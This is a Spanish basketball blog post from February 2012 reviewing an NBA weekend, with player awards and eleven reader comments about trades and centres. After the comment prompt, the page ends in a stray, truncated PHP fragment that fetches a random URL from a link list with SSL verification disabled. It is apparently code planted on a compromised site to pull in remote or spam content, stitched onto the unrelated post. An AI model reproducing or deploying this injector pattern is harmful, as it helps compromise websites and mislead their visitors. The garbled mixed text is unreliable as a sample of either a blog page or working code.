Informe del fin de semana: Los Celtics nunca se fueron

06 de February de 2012 por TheDeerHunter

Sin que sirva de precedente confieso que he estado inusualmente desconectado de la liga durante el fin de semana. Resulta extraña la sensación de acudir al propio blog a empaparme de lo que ha ocurrido, como un visitante más. Esto se está convirtiendo en una especie de café especializado. Un agradable punto de encuentro para noctámbulos y también para los seguidores en diferido. Mi ídolo no es Kobe, ni LeBron. Es el hermano pequeño de Jose Luis.

El viernes, como viene siendo habitual, el foco de atención fue a parar a Ricky y los Wolves. Por lo leído fue un partidazo. En menuda forma está Pekovic. Si Milicic pone un circo le crecen los enanos. Y luego Morrow en plan cañón “Gran Berta”. Nos satisface la idea de que Deron Williams sudó lo suyo ante Ricky, y sobre todo: “Robo de Ricky a 4 segundos del final!!! Y ganan los Wolves!!”. (HeiNeKen). Los Wolves ya son una de las sensaciones de la liga.

Como también es habitual no se puede evitar la atención en las dos franquicias más clásicas. Los Lakers se llevaron una victoria sufridísima de Denver, con mucha dosis de polémica. Los Celtics, además de los habituales regalos de D’Antoni y los suyos, también tuvieron su propia porción: “Final de partido surrealista para el NYK-Celtics, con el triple de Pierce fuera de tiempo por media décima y la pizarra de D’Antoni quedando en evidencia.” (MagicJohnson32).

Por lo demás, destacar las actuaciones de Durant y Paul George; el duelo Jennings vs Brandon Knight y la victoria excesivamente cómoda de Miami en Philadelphia.

Durante la gran saturday night hubo bastante menos actividad aquí. El sempiterno Sancho se lo pasó en grande con el Kings@Warriors con prórroga (terminando a las 7 de la mañana como cualquiera de sus noches de juerga): “Un duelo entretenido del Pacífico, donde GSW demostró su perezosidad histórica en el aspecto defensivo, y lo acabó pagando.”

De la noche del saábado comentar también que Parker le hizo ciscos a Westbrook y que Orlando parece haber salido de la crisis con una impresionante victoria ante Pacers. En cambio, los Lakers salieron torteados de Salt Lake y Denver probó su propia medicina y fue destrozado por Nico Batum a triplazo limpio. Y victorias de los Knicks, que se llevaron su derbi, y de los Wolves, que volvieron a ganar.

Finalmente anoche, antes de la Superbowl vimos una importantísima victoria de Boston ante Memphis y otra más previsible de los Heat ante Toronto.

PREMIOS

MVP: La mejor actuación del fin de semana fue la de Tony Parker que cuajó su mejor actuación de los últimos años contra uno de los mejores equipos de la liga, los Oklahoma City Thunder. Les endosó nada menos que 42 puntos adornados con 9 asistencias. Paul Pierce fue clave en las dos victorias de los Celtics. El viernes fueron 30 puntos, 7 rebotes y 5 asistencias y anoche, 21 puntos, 6 rebotes y 6 asistencias.


Rookie:
Premio para Ricky Rubio, clave en las 2 victorias de los Wolves este fin de semana. El viernes fueron 10 puntos, 10 asistencias y 6 robos y el sábado 13 puntos y 11 asistencias. Destacar también a Kyrie Irving (20-4-7 y victoria frente Dallas) y Kawhi Leonard (15-6-5).

Sorpresa:  La actuación más sorprendente del fin de semana es sin duda la Jeremy Lin, que pasó de casi no jugar a ser clave en la victoria de los Knicks frente los Nets con 25 puntos, 5 rebotes, 7 asistencias y 2 robos. Nikola Pekovic demostró con 27 puntos y 11 rebotes que es mucho mejor que Darko Milicic y Nico Batum se fue a los 33 puntos frente Denver.

Esfuerzo en vano: Rudy Gay no ha conocido el sabor de la victoria este fin de semana a pesar de sus  23 puntos y 8 rebotes y anoche del viernes y sus 21 puntos y 7 rebotes de anoche.

Comenta

61 comentarios a esta entrada

  1. nba dice:
    #1

    Por eso decia yo lo de Lakers, ya que de los posibles aspirantes al anillo aunque sea remotamente tal como estan las cosas es el unico equipo que no tiene un base decente, y sería un buen modo de quitarse algo de basura de Lakers y los suns obtendrían un rookie y a lo mejor MWP y Walton hace algo

      Citar

  2. rumbero dice:
    #2

    Los cumple hoy. Y para celebrarlo se ha autoregalado un 24-11 en 31 minutos para ganar en el Philips Arena. No deja de alucinarme este tio.
    Habrá que estar atentos que cada vez suena con más fuerza que no acabe la temporada con los Suns. En los Knicks ya no le veo que tienen el puesto de base bien cubierto con Lin (modo ironia off). Y en los Lakers con Brown nose si quiero verlo…

      Citar

  3. nba dice:
    #3

    Pues yo creo que Nash en los Lakers sería el mejor “entrenador” que podríamos tener, supongo que Kobe sería alguien a quien escucharia/respetaria y, todos los interiores probablemente aunmentarían su anotación de manera brutal , si Gortat que tampoco es que sea nada del otro mundo ,con Nash al lado parece “All-star” , pues Pau y Bynum sería la o.st.a.

      Citar

  4. Denise dice:
    #4

    nba: con los rumores que hay de Nash, los Lakers podrían empaquetar MWP + Walton + (Goudelock o Morris) a los Suns por nash , asi estos obtendrían algo , y por una vez los Lakers tendrían un base que merezca la pena.Y dejarse de mirar otras opciones

    Si, hombre y de paso a Mc Roberts por Gortat…

    Digo yo, que los dirigentes de los Suns tambien piensan y para qué querrían hacerse con los contratazos de dos paquetes como Metta y Walton que les quedan mas de 30 millones de dolares por cobrar entre ambos.

    Tio, en serio, ese traspaso es inmoral, ilegal….y engorda.

      Citar

  5. nba dice:
    #5

    Salvando las distancias, eso mismo se pensaba del trade de Melo, yo creo que el que sobra es Walton , MWP todavía creo que puede aportar algo de intensidad en defensa y , al menos se llevarían un base rookie

      Citar

  6. Denise dice:
    #6

    nba: , si Gortat que tampoco es que sea nada del otro mundo ,con Nash al lado parece “All-star” ,

    Marcin Gortat es un crack, el cual, tuvo la mala suerte de estar de sombra de Howard en Orlando. Pero cualquiera que viera partidos de aquellos Magic, vería que Gortat en los 12 minutillos que le dejaba Superman jugar era bastante bueno. Yo no tenía ninguna duda de que cuando tuviese continuidad en otro equipo sería un tio de hacer 14-12 con la gorra.
    Después de Howard, Marc, y Bynum, para mí el mejor pivot de la competición codeandose con Horford, Bogut y McGee (otro muchachote que dentro de un par de años sera un crack).

      Citar

  7. Denise dice:
    #7

    nba: Salvando las distancias, eso mismo se pensaba del trade de Melo, yo creo que el que sobra es Walton , MWP todavía creo que puede aportar algo de intensidad en defensa y , al menos se llevarían un base rookie

    No compares a buenos jugadores como Felton, Gallinari, Wilson Chandler o Mozgov con paquetes como Walton, Metta, y los rookies que son demasiado verdes para valorarlos aun.

    Antes, en mi lista de Centers se me olvidó Nene.., creo que no se me olvida ninguno mas. Bargnani es bueno, pero no “ejerciendo” de pivot, Es un pivot porque mide 2,12 pero no es el clasico pivot

      Citar

  8. Sancho88 dice:
    #8

    Denise: Marcin Gortat es un crack, el cual, tuvo la mala suerte de estar de sombra de Howard en Orlando. Pero cualquiera que viera partidos de aquellos Magic, vería que Gortat en los 12 minutillos que le dejaba Superman jugar era bastante bueno. Yo no tenía ninguna duda de que cuando tuviese continuidad en otro equipo sería un tio de hacer 14-12 con la gorra.
    Después de Howard, Marc, y Bynum, para mí el mejor pivot de la competición codeandose con Horford, Bogut y McGee (otro muchachote que dentro de un par de años sera un crack).

    Denise… te has crecido un poquito con Gortat, jejeje. Yo le pondría un escalón por debajo de esos que comentas. No te dejas a Cousins, o piensas que Gortat es mejor que Cousins?

      Citar

  9. rumbero dice:
    #9

    Yo hubiera metido a Monroe también. Tengo debilidad por McGee, tiene unas cualidades físicas tremendas, pero me da que dentro de dos años Monroe va a ser más pivot que él.

      Citar

  10. Denise dice:
    #10

    Sancho88: Denise… te has crecido un poquito con Gortat, jejeje. Yo le pondría un escalón por debajo de esos que comentas. No te dejas a Cousins, o piensas que Gortat es mejor que Cousins?

    Efectivamente. Pienso que Gortat es mejor que Cousins. El de Sacramento puede tener mas calidad tecnica e individual, pero para un equipo yo ficharía a Gortat. Me parece mucho mejor.

    Cierto, me olvidé de Monroe, aunque sinceramente, en estos dos últimos años he visto muy pocos partidos enteros de Detroit, por lo que no lo puedo valorar justamente mas allá de las estadisticas.

      Citar

  11. Sancho88 dice:
    #11

    Con los ojitos cerradas te traspasaría yo a Gortat por Cousins, si yo tuviera al polaco y tú al yankee. Me parece increíble lo que dices, pero lo acepto. sobre gustos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>